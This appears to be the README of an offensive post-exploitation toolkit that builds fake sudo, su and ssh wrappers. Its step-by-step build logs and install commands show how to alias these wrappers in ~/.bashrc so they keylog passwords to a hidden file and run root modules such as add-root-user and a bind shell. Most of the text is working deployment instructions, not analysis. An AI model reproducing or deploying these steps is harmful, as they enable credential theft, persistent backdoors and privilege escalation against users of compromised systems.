fakesudo cmd
runssudo fakesudo cmd
After it is running as root, the fakesudo create a child process for executing some of the modules, and in the main PID, it runs the original command.
Note: fakesudo only changes the command if the user runs
sudo cmd [args]
, if some additional flags are used, then the command isn’t touched.
Almost the same process happens with the su:
The user types su -
fakesu -
runs
The fakesu executes su - -c fakesu
After it is running as root, the fakesu create a child process for executing some of the modules, and in the main PID, it runs bash -i
Note: fakesu only changes the command if the user runs
su
orsu -
, if some additional flags are used, then the command isn’t touched.
For now, there are only three modules:
I can add more modules in the future, but if you are familiar with the C language, I believe that it is not very difficult to change the programs to run what you want as root, just modify a few lines of code and change the super()
function.
First, build the base library:
$ make
CC .obj/globals.o
CC .obj/getinode.o
CC .obj/tas-execv.o
CC .obj/tty.o
CC .obj/xreadlink.o
AR .obj/libtas.a
After that, you can build generic-keylogger, sudo or su, by running make [target-bin]
Example:
$ make su
make[1]: Entering directory '/home/test/tas/fakebins/su'
[+] configuring fakesu ...
enable keylogger? [y/N] y
number of lines to record [empty = store all]:
logfile (default: /tmp/.keys.txt):
use some FUN modules? [y/N] n
[+] configuration file created in /home/test/tas/fakebins/su/config.h
CC su
make[1]: Leaving directory '/home/test/tas/fakebins/su'
Compile:
$ make generic-keylogger
make[1]: Entering directory '/home/test/tas/fakebins/generic-keylogger'
[+] configuring generic-keylogger ...
number of lines to record [empty = store all]: 3
logfile (default: /tmp/.keys.txt):
[+] configuration file created in /home/test/tas/fakebins/generic-keylogger/config.h
CC generic-keylogger
make[1]: Leaving directory '/home/test/tas/fakebins/generic-keylogger'
Install:
$ mkdir ~/.bin
$ cp generic-keylogger ~/.bin/ssh
$ echo "alias ssh='$HOME/.bin/ssh'" >> ~/.bashrc
In action:
Compile:
make[1]: Entering directory '/home/test/tas/fakebins/sudo'
[+] configuring fakesudo ...
enable keylogger? [y/N] n
use some FUN modules? [y/N] y
[1] add-root-user
[2] bind-shell
[3] system
[4] cancel
> 2
listen port (Default: 1337): 5992
[+] configuration file created in /home/test/tas/fakebins/sudo/config.h
CC sudo
make[1]: Leaving directory '/home/test/tas/fakebins/sudo'
Install:
$ cp sudo ~/.sudo
$ echo "alias sudo='$HOME/.sudo'" >> ~/.bashrc
In action:
leet-shell is an example of how you can manipulate the tty output, it allows you to use the bash like a 1337 h4x0r.
[test@alfheim tas]$ make fun/leet-shell
CC fun/leet-shell
[t3st@alfheim tas]$ fun/leet-shell
SP4WN1NG L33T SH3LL H3R3 !!!
[t3st@4lfh31m t4s]$ 3ch0 'l33t sh3ll 1s l33t !!!'
l33t sh3ll 1s l33t !!!
Somethings can make the fake-programs not work as expected:
The sudo will always ask for the password when the keylogger function is used in the fakesudo.
How to protect yourself?
This is a post-exploitation technique to performs privilege escalation and information gathering, if you want to protect yourself, not be invaded is a good way to start…